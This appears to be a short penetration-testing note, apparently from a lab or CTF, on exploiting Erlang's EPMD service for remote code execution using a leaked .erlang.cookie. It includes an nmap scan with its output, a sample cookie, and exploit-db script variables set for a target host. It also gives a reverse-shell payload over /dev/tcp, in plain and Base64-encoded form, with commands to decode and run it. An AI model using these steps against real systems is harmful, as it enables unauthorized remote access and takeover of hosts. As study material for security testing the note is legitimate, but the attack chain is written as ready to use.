Erlang - 4369

Erlang Cookie RCE

https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd

nmap -sV -Pn -n -T4 -p 4369 --script epmd-info 192.168.1.2

4369/tcp  open   epmd       Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 65000
65000/tcp open   unknown

If you can leak the authentication cookie, you will be able to execute code on the host. Usually this cookie is located in ~/.erlang.cookie and is generated by Erlang at first start.

There is an EPMD port, and a rabbit service on port 65000. To get RCE we need the erlang.cookie value. We can brute-force it, or we can find it via another service on the host.

.erlang.cookie
JFKERIPLFKVJSQRDIXJS

https://www.exploit-db.com/exploits/49418

$ python3 49418

We need to change the relevant parts of the code.

TARGET = "192.168.1.2"
PORT = 65000
COOKIE = "JFKERIPLFKVJSQRDIXJS"
CMD = "id"
Reverse-shell payload, Base64 encoded: /bin/bash -i >& /dev/tcp/192.168.1.1/80 0>&1

CMD="echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xLzgwIDA+JjE= | base64 -d > shell.sh"
CMD="bash shell.sh"
